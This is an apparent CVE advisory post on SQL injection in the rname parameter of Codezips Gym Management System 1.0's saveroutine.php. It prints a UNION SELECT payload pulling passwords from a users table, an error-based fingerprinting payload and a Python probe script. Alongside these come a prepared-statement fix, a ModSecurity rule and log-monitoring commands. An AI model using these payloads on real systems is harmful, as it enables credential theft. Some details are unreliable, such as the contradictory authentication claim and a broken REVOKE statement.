Codezips Gym Management System 10, SQL Injection, CVE-2025-0881 (Critical)

Listen to this Post

How the CVE Works:

CVE-2025-0881 exploits improper input sanitization in the `rname` parameter of `/dashboard/admin/saveroutine.php` in Codezips Gym Management System 1.0. Attackers can craft malicious SQL queries through this parameter, which are directly executed by the backend database. The vulnerability occurs because user-supplied input is concatenated into SQL statements without proper escaping or prepared statements. Remote attackers can leverage this to read/modify database contents, bypass authentication, or execute system commands depending on database configuration. The attack requires no authentication (PR:L) and can be performed through standard HTTP requests.

DailyCVE Form:

Platform: Codezips Gym Management
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/23/2025

What Undercode Say:

-- Exploit PoC:
POST /dashboard/admin/saveroutine.php HTTP/1.1
rname=' UNION SELECT 1,2,3,4,5,6,7,8,9,password FROM users--
-- Database fingerprinting:
rname=' AND 1=CONVERT(int,(SELECT @@version))--
-- Protection (PHP):
$stmt = $pdo->prepare("INSERT INTO routines (name) VALUES (?)");
$stmt->execute([filter_input(INPUT_POST, 'rname', FILTER_SANITIZE_STRING)]);
-- WAF Rule (ModSecurity):
SecRule ARGS:rname "@detectSQLi" "id:1001,deny,status:403"
-- Detection Command:
grep -r "saveroutine.php" /var/www/ --include=".php" | grep "\$_POST"
-- Mitigation Steps:
1. Update to patched version
2. Implement prepared statements
3. Apply least privilege DB permissions
4. Enable PHP error logging
-- Python Check Script:
import requests
vuln_url = "http://target/dashboard/admin/saveroutine.php"
test_payload = {"rname":"test' AND '1'='1"}
response = requests.post(vuln_url, data=test_payload)
if "error in your SQL" in response.text:
print("Vulnerable to CVE-2025-0881")
-- Database Hardening:
REVOKE ALL PRIVILEGES ON gym_db. FROM 'webuser'@'localhost';
GRANT SELECT, INSERT ON gym_db.routines TO 'webuser'@'localhost';
-- Log Analysis Command:
tail -f /var/log/apache2/access.log | grep "saveroutine.php" | grep -E "UNION|SELECT|--"

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top